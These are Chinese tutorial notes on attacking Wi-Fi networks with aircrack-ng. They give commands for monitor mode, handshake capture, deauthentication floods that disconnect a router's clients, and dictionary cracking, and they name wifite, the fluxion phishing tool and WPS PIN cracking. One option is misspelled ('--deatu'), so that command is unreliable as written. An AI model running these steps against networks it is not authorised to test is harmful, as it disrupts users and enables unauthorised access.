抓包
注:磊科nw392 8812au无线网卡开启监听模式后仍然为wlan0
1. airmon-ng check kill (关闭所有相关进程 视情况决定)
2. airmon-ng (列出所有识别到的网卡信息)
3. airmon-ng start wlan0 (开启网卡监听模式)
4. airodump-ng wlan0 (扫描wifi信号)
参数解释:
- BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
- ESSID(The Extended Service Set Identifier): AP 的名称。
- PWR(Power): 信号强度。
- Beacons: AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的 beacon,所以它们能在很远的地方就被发现。
- \#Data:当前数据传输量。
- \#/s:过去10秒钟内每秒捕获数据分组的数量。
- CH(Channel): AP 所在的频道。
- MB: AP 的最大传输速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后 面带.的表示短封包标头,处理速度快,更利于破解。
- ENC(Encryption): 使用的加密算法体系。
- CIPHER: 检测到的加密算法。#这个和ENC 的区别我确实不明白,有没有知道的朋友可以告诉我。
- AUTH(Authority): 认证方式。
- Elapsed: 用过的时间。记录 TEST-jglimmers 的 MAC 地址(BSSID),频道(CH)。
- BSSID: 88:25:93:5A:B5:6A
- CH: 1
5. airodump-ng --bssid [路由MAC地址] -c [信道] --write [存储文件(如mumu)] wlan0 (开始抓包)
6. aireplay-ng -a [路由MAC地址] -0 5 wlan0 (攻击连接该路由的所有设备 反认证包个数:5)
aireplay-ng -a[路由MAC地址] -c [被攻击客户机MAC地址] --deatu 10
-–deatu:指定发送反认证包的个数,也可以使用-0(阿利伯数字0)来指定反认证包的个数
7. airmon-ng stop wlan0 (关闭监听模式)
跑包
1. ewsa跑包
2. hashcat
3. aircrack-ng [cap包] -w [字典路径]
可指定加密方式
-a1:指定WEP加密方式
-a2:指定WPA-PSk加密方式
傻瓜式操作(监听+抓包+攻击+猜解)
wifite
wifi钓鱼
fluxion
WPS破解 pin码破解
待补充......
参考:
https://www.kaliorg.com/thread-54-1-4.html
https://www.kaliorg.com/thread-1-1-6.html
https://www.kaliorg.com/thread-68-1-4.html